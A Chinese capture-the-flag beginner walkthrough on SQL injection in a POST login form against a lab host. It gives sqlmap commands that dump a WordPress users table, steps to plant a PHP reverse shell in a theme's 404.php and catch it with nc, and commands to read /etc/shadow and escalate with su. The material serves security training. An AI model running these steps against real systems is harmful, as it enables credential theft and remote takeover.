6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文

1.信息探测

#扫描主机开放的全部端口
nmap -T4 -p- 192.168.2.117
#扫描靶场全部信息
nmap -T4 -A -v 192.168.2.117
#探测敏感信息
nikto -host http://
dirb http://
#漏洞扫描
owasp

2.漏洞利用

登录界面
6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文_第1张图片

#burpsuite抓包,需要把浏览器设置代理
#在登录界面尝试登录,抓取请求数据包,保存为request.raw文件
#用sqlmap利用漏洞

6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文_第2张图片

#查看服务器所有数据库
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch

6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文_第3张图片

#查看wordpress8080数据库的表名
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batchv

在这里插入图片描述

#查看users表的列名
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch

6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文_第4张图片

查看users表的列和值
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C username,password --dump --dbms mysql --batch

6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文_第5张图片

3.上传webshell获取控制权

#主题的404.php可以上传webshell
#webshell 获取 /usr/share/webshells/php/ 目录
#使用反弹shell脚本
cp php-reverse-shell.php /root/Downloads/
#修改脚本参数,攻击机IP和端口
gedit php-reverse-shell.php
#启动监听
nc -nlvp 4444
#访问页面,获取反弹shell
http://192.168.2.117:8080/wordpress/wp-content/themes/twentythirtheen/404.php
#美化终端
python -c "import pty;pty.spawn('/bin/bash')"
#查看敏感文件
cat /etc/shadow 
cat /etc/passwd
#使用su - 提权
su - 
#口令尝试wordpress8080数据库中的密码,登录成功

4.总结

只要是用户可以输入的位置都是有可能存在注入点的
漏洞扫描器的结果不一定准确

你可能感兴趣的:(CTF学习)